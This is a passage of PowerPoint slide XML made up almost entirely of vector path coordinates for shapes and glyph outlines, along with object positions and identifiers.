                    <a:pt x="562389" y="98429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586103" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597260" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622803" y="99739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625039" y="98723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="97639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588022" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583596" y="94432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558097" y="61893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558097" y="48074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558978" y="42135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587503" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="11538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620951" y="8241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614989" y="5961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604238" y="3341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598841" y="2687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="627524" y="82013"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="626575" y="82013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621674" y="86416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617926" y="88764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616181" y="89803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605164" y="94116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599134" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="82013"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="627524" y="14090"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="598773" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604600" y="15151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615486" y="19374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620974" y="22738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626507" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="14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9F429BE-F38C-1D4C-6E46-C954A111F898}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7229119" y="4187189"/>
              <a:ext cx="934085" cy="311150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="934084" h="311150">
                  <a:moveTo>
                    <a:pt x="933919" y="194957"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="915454" y="139877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854075" y="88531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809891" y="65595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758088" y="45212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699706" y="27901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635774" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567334" y="4673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498386" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433006" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372313" y="5321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317449" y="14681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269506" y="28092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229628" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178549" y="89471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169595" y="115925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172948" y="143675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184061" y="163779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164782" y="160083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102806" y="159029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51142" y="168275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15113" y="186194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9690" y="238658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41300" y="263575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89979" y="283197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150876" y="294843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212852" y="295910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264515" y="286651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300545" y="268732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310667" y="252018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345427" y="265684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403809" y="282994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467741" y="296684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536194" y="306222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605129" y="310896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670509" y="310578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731202" y="305574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="786066" y="296214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834009" y="282803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873887" y="265671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924966" y="221424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="933919" y="194957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4" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A5DC0D9-293E-A15A-7C31-3EC2E0CD0C0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45764" y="3752008"/>
              <a:ext cx="251336" cy="88064"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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664B02A7-F01C-0198-3899-CF3E43694DF0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7737725" y="3673681"/>
              <a:ext cx="269240" cy="239395"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="269240" h="239395">
                  <a:moveTo>
                    <a:pt x="0" y="238789"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269107" y="190523"/>
                  </a:lnTo>
                </a:path>
                <a:path w="269240" h="239395">
                  <a:moveTo>
                    <a:pt x="0" y="48265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269107" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="269240" h="239395">
                  <a:moveTo>
                    <a:pt x="5077" y="45725"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5077" y="2387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6" name="object 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD58D77-8CCD-F9B8-A2BE-5B332C398A3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43372" y="3386758"/>
              <a:ext cx="723672" cy="1064259"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E38C4540-09FD-4B45-B0CF-7E3EA8C7315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33499" y="4025145"/>
              <a:ext cx="413819" cy="414019"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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305285BC-F1FC-3CE4-0BAD-145E003827AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7243017" y="4502716"/>
              <a:ext cx="821690" cy="107314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="13686" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26559" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41285" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45475" y="87997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34803" y="87997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13686" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="73381" y="21587"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="61905" y="21587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83022" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98064" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102255" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90114" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73381" y="21587"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="124172" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111095" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90114" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102255" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124172" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="69132" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="55581" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34803" y="87997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45475" y="87997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61905" y="21587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73381" y="21587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69132" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="181493" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171329" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163495" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135327" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134696" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135353" y="76511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165738" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165988" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174491" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179392" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184067" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192966" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197325" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201616" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201616" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170494" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166948" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160511" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157733" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155407" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152968" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151152" y="84257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148270" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147570" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147570" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203084" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203084" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202899" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147563" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148016" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148112" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150393" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158456" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163854" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195948" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194818" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189330" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181493" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="201616" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="200938" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198725" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195021" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184654" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179482" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201616" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201616" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="195948" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="177382" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182419" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189036" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190707" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190753" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202899" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202567" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201017" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198434" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195948" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="276078" y="101432"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="237481" y="101432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240597" y="103126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243737" y="104503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250128" y="106513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253855" y="107032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262708" y="107032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266932" y="106129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274565" y="102584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276078" y="101432"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="237481" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="224811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224811" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236690" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="101432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276078" y="101432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278066" y="99919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281273" y="96374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281925" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252296" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249360" y="95313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244188" y="94048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241156" y="92942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="48142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240733" y="45635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244234" y="43580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251800" y="40374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255526" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284489" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283396" y="37755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283191" y="37484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="37484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="284489" y="39584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="265825" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270613" y="41909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276553" y="51213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277989" y="57883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278021" y="76887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276033" y="84113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268083" y="93326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262595" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281925" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284277" y="92942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286671" y="88719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290239" y="78648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291120" y="72980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291120" y="66703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286775" y="43411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284489" y="39584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="271223" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="257333" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252816" y="28451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244821" y="32177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241049" y="34571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237481" y="37484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283191" y="37484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278247" y="30935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271223" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="360998" y="82013"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360050" y="82013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360050" y="98723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366035" y="101387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371907" y="103374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383470" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389975" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403955" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409737" y="105948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419313" y="102697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423491" y="100461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430014" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391510" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385254" y="94071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371952" y="89487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366080" y="86235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360998" y="82013"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="405423" y="2687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="398354" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390525" y="3190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360659" y="23009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360659" y="38748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395485" y="60584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403345" y="61758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407004" y="62480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423581" y="83322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421277" y="87455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412063" y="93664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405626" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430014" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437493" y="80184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437493" y="69074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="46855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392075" y="46087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374549" y="25493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376717" y="21654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385412" y="15716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391149" y="14225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433428" y="14225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433428" y="9709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428889" y="7722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423671" y="6074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411905" y="3364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405423" y="2687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="433428" y="14225"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="404813" y="14225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411182" y="15287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423649" y="19554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428663" y="22242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432502" y="25493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433428" y="25493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433428" y="14225"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="821690" h="107314">
                  <a:moveTo>
                    <a:pt x="502222" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="492059" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484225" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456057" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455426" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456083" y="76511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486470" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486720" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="495221" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500122" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504797" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513718" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518077" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522345" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522345" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491223" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487677" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481241" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478485" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476136" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473697" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471882" y="84257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469000" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468322" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468322" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523813" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523813" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523629" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468316" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468749" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468841" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471123" y="47961"/>
                  </a:lnTo>
